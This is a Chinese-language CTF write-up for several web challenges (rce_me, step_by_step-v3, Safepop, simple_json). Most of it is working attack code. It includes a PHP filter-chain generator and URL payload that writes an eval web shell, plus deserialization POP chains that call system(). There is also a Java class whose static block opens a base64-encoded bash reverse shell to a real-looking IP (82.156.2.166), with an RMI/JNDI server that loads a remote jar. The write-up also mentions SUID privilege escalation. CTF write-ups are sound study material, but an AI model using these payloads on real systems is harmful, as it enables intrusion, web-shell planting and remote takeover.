rce_me

hxp CTF 2021 - The End Of LFI? - 跳跳糖 (tttang.com)

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
<?php
$base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4";
$conversions = array(
    'R' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2',
    'B' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2',
    'C' => 'convert.iconv.UTF8.CSISO2022KR',
    '8' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',
    '9' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB',
    'f' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213',
    's' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61',
    'z' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS',
    'U' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932',
    'P' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213',
    'V' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5',
    '0' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2',
    'Y' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2',
    'W' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2',
    'd' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2',
    'D' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2',
    '7' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2',
    '4' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2'
);

$filters = "convert.base64-encode|";
# make sure to get rid of any equal signs in both the string we just generated and the rest of the file
$filters .= "convert.iconv.UTF8.UTF7|";

foreach (str_split(strrev($base64_payload)) as $c) {
    $filters .= $conversions[$c] . "|";
    $filters .= "convert.base64-decode|";
    $filters .= "convert.base64-encode|";
    $filters .= "convert.iconv.UTF8.UTF7|";
}
$filters .= "convert.base64-decode";

$final_payload = "php://filter/{$filters}/resource=data://,aaaaaaaaaaaaaaaaaaaa";
echo ($final_payload);

payload:

1
?file=php%3A%2F%2Ffilter%2Fconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2EUTF16LE%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EUCS2%2EEUCTW%7Cconvert%2Eiconv%2EL4%2EUTF8%7Cconvert%2Eiconv%2EIEC%5FP271%2EUCS2%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EISO2022KR%2EUTF16%7Cconvert%2Eiconv%2EL7%2ENAPLPS%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EISO2022KR%2EUTF16%7Cconvert%2Eiconv%2EUCS%2D2LE%2EUCS%2D2BE%7Cconvert%2Eiconv%2ETCVN%2EUCS2%7Cconvert%2Eiconv%2E857%2ESHIFTJISX0213%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2EUTF16LE%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EUCS2%2EEUCTW%7Cconvert%2Eiconv%2EL4%2EUTF8%7Cconvert%2Eiconv%2E866%2EUCS2%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EISO2022KR%2EUTF16%7Cconvert%2Eiconv%2EL3%2ET%2E61%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2EUTF16LE%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EUCS2%2EUTF8%7Cconvert%2Eiconv%2ESJIS%2EGBK%7Cconvert%2Eiconv%2EL10%2EUCS2%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2EUTF16LE%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EUCS2%2EUTF8%7Cconvert%2Eiconv%2EISO%2DIR%2D111%2EUCS2%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2EUTF16LE%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EUCS2%2EUTF8%7Cconvert%2Eiconv%2EISO%2DIR%2D111%2EUJIS%7Cconvert%2Eiconv%2E852%2EUCS2%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2EUTF16LE%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EUTF16%2EEUCTW%7Cconvert%2Eiconv%2ECP1256%2EUCS2%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EISO2022KR%2EUTF16%7Cconvert%2Eiconv%2EL7%2ENAPLPS%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2EUTF16LE%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EUCS2%2EUTF8%7Cconvert%2Eiconv%2E851%2EUTF8%7Cconvert%2Eiconv%2EL7%2EUCS2%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EISO2022KR%2EUTF16%7Cconvert%2Eiconv%2ECP1133%2EIBM932%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EISO2022KR%2EUTF16%7Cconvert%2Eiconv%2EUCS%2D2LE%2EUCS%2D2BE%7Cconvert%2Eiconv%2ETCVN%2EUCS2%7Cconvert%2Eiconv%2E851%2EBIG5%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EISO2022KR%2EUTF16%7Cconvert%2Eiconv%2EUCS%2D2LE%2EUCS%2D2BE%7Cconvert%2Eiconv%2ETCVN%2EUCS2%7Cconvert%2Eiconv%2E1046%2EUCS2%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2EUTF16LE%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EUTF16%2EEUCTW%7Cconvert%2Eiconv%2EMAC%2EUCS2%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EISO2022KR%2EUTF16%7Cconvert%2Eiconv%2EL7%2ESHIFTJISX0213%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2EUTF16LE%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EUTF16%2EEUCTW%7Cconvert%2Eiconv%2EMAC%2EUCS2%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2EUTF16LE%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EUCS2%2EUTF8%7Cconvert%2Eiconv%2EISO%2DIR%2D111%2EUCS2%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EISO2022KR%2EUTF16%7Cconvert%2Eiconv%2EISO6937%2EJOHAB%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EISO2022KR%2EUTF16%7Cconvert%2Eiconv%2EL6%2EUCS2%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2EUTF16LE%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EUCS2%2EUTF8%7Cconvert%2Eiconv%2ESJIS%2EGBK%7Cconvert%2Eiconv%2EL10%2EUCS2%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EISO2022KR%2EUTF16%7Cconvert%2Eiconv%2EUCS%2D2LE%2EUCS%2D2BE%7Cconvert%2Eiconv%2ETCVN%2EUCS2%7Cconvert%2Eiconv%2E857%2ESHIFTJISX0213%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Ebase64%2Ddecode%2Fresource%3D/etc/passwd&0=echo '%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%27%63%6d%64%27%5d%29%3b%3f%3e' %3e a.php

蚁剑连a.php,然后就是suid提权,直接date提权就好了

step_by_step-v3

源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
<?php
error_reporting(0);
class yang
{
    public $y1;

    public function __construct()
    {
        $this->y1->magic();
        echo 1;
    }

    public function __tostring()
    {
        ($this->y1)();
    }

    public function hint()
    {
        include_once('hint.php');
        if(isset($_GET['file']))
        {
            $file = $_GET['file'];
            if(preg_match("/$hey_mean_then/is", $file))
            {
                die("nonono");
            }
            include_once($file);
        }
    }
}

class cheng
{
    public $c1;

    public function __wakeup()
    {
        $this->c1->flag = 'flag';
    }

    public function __invoke()
    {
        $this->c1->hint();
    }
}

class bei
{
    public $b1;
    public $b2;

    public function __set($k1,$k2)
    {
        print $this->b1;
    }

    public function __call($n1,$n2)
    {
        echo $this->b1;
    }
}

unserialize('');

?>

反序列化poc:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
<?php

class yang
{
    public $y1;
    public function __construct()
    {
        // $this->y1 = new bei();
    }
    
}

class cheng
{
    public $c1;
    public function __construct()
    {
        
    }
    
}

class bei
{
    public $b1;
    public $b2;

    public function __construct()
    {
        // $this->b2 = new yang();
        
    }
}

$a = new yang();
$b = new cheng();
$c = new bei();

$b->c1 = $c;
$c->b1 = $a;
$a->y1 = "phpinfo";

echo serialize($b);

?>

flag在phpinfo里

img

Safepop

源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
<?php
class Fun{
    private $func = 'call_user_func_array';
    public function __call($f,$p){
        call_user_func($this->func,$f,$p);
    }
    public function __wakeup(){
        $this->func = '';
        die("Don't serialize me");
    }
}

class Test{
    public function getFlag(){
        system("cat /flag?");
    }
    public function __call($f,$p){
        phpinfo();
    }
    public function __wakeup(){
        echo "serialize me?";
    }
}

class A{
    public $a;
    public function __get($p){
        if(preg_match("/Test/",get_class($this->a))){
            return "No test in Prod\\n";
        }
        return $this->a->$p();
    }
}

class B{
    public $p;
    public function __destruct(){
        $p = $this->p;
        echo $this->a->$p;
    }
}

unserialize('');

poc:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
<?php
class Fun{
    private $func;
    public function __construct()
    {
        $this->func = 'system';
    }

}

class Test{
    public function __construct()
    {
        
    }
}

class A{
    public $a;
    public function __construct()
    {
        
    }
}

class B{
    public $p;
    public function __construct()
    {
        
    }
}

$a = new A();
$b = new B();
$fun = new Fun();
$test = new Test();
$a->a = $fun;
$b->p = 'cat /f*';
$b->a = $a;
echo urlencode(serialize($b));

flag:

1
flag{55410055464485123619498041307525}

simple_json

fastjson1.2.83

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<dependency>
			<groupId>org.springframework.boot</groupId>
			<artifactId>spring-boot-starter-web</artifactId>
			<exclusions>
				<exclusion>
					<groupId>org.apache.tomcat.embed</groupId>
					<artifactId>tomcat-embed-el</artifactId>
				</exclusion>
			</exclusions>
		</dependency>
<dependency>
			<groupId>com.alibaba</groupId>
			<artifactId>fastjson</artifactId>
			<version>1.2.83</version>
</dependency>

题目给的类似的payload:

1
{"content" : {"@type": "ycb.simple_json.service.JNDIService", "target":"ldap://ip:port/Exp"}, "msg":{"$ref":"$.content.context"}}

各种信息搜集之后:

没有ELProcessor的时候: https://tttang.com/archive/1405/#toc_snakeyaml

Yaml反序列化: https://www.yuque.com/jinjinshigekeaigui/qskpi5/rgwdc7#wpl31

由此先创建一个Exp恶意类,用于RCE,还有META-INF/services/javax.script.ScriptEngineFactory 文件,内容为Exp ,然后编译Exp类,生成jar包一起放到vps上

Untitled

用python开启服务:

python3 -m http.server –bind 0.0.0.0 8888

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
import javax.script.ScriptEngine;
import javax.script.ScriptEngineFactory;
import java.io.IOException;
import java.util.List;

public class Exp implements ScriptEngineFactory {

    static {
        try {
            System.out.println("Hacked by ameuu");
            Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84Mi4xNTYuMi4xNjYvMjMzMyAwPiYx}|{base64,-d}|{bash,-i}");
        } catch (IOException e){
            e.printStackTrace();
        }
    }

    @Override
    public String getEngineName() {
        return null;
    }

    @Override
    public String getEngineVersion() {
        return null;
    }

    @Override
    public List<String> getExtensions() {
        return null;
    }

    @Override
    public List<String> getMimeTypes() {
        return null;
    }

    @Override
    public List<String> getNames() {
        return null;
    }

    @Override
    public String getLanguageName() {
        return null;
    }

    @Override
    public String getLanguageVersion() {
        return null;
    }

    @Override
    public Object getParameter(String key) {
        return null;
    }

    @Override
    public String getMethodCallSyntax(String obj, String m, String... args) {
        return null;
    }

    @Override
    public String getOutputStatement(String toDisplay) {
        return null;
    }

    @Override
    public String getProgram(String... statements) {
        return null;
    }

    @Override
    public ScriptEngine getScriptEngine() {
        return null;
    }

}

本地开启rmi服务,jar打包,放到vps上执行:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
package main;

import com.sun.jndi.rmi.registry.ReferenceWrapper;
import org.apache.naming.ResourceRef;

import javax.naming.Reference;
import javax.naming.StringRefAddr;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class Main {

    public static ResourceRef tomcat_snakeyaml(){
        ResourceRef ref = new ResourceRef("org.yaml.snakeyaml.Yaml", null, "", "",
                true, "org.apache.naming.factory.BeanFactory", null);
        String yaml = "!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [\\"<http://82.156.2.166:8888/exp.jar\\"]]]]">;
        ref.add(new StringRefAddr("forceString", "a=load"));
        ref.add(new StringRefAddr("a", yaml));
        return ref;
    }

    public static void main(String[] args) throws Exception {
        int rmi_port = 1559;
        System.setProperty("java.rmi.server.hostname", "82.156.2.166");
        Registry registry = LocateRegistry.createRegistry(rmi_port);
        System.out.println(System.getProperty("java.rmi.server.hostname"));

        ResourceRef ref = tomcat_snakeyaml();

        ReferenceWrapper referenceWrapper = new ReferenceWrapper(ref);
        registry.bind("Exploit", referenceWrapper);

    }
}

然后传入payload

1
{"content" : {"@type": "ycb.simple_json.service.JNDIService", "target":"ldap://82.156.2.166:1559/Exploit"}, "msg":{"$ref":"$.content.context"}}

但是没有成功连上,利用别的师傅写的工具,把yaml函数写入工具之后打包,

java -cp JNDI-Injection-Bypass-1.0-SNAPSHOT-all.jar payloads.EvilRMIServer 82.156.2.166

Untitled

记得监听端口

最终payload:

1
{"content" : {"@type": "ycb.simple_json.service.JNDIService", "target":"rmi://82.156.2.166:1097/ExecBySnakeYaml"}, "msg":{"$ref":"$.content.context"}}

拿到flag

Untitled

little_db在复现中……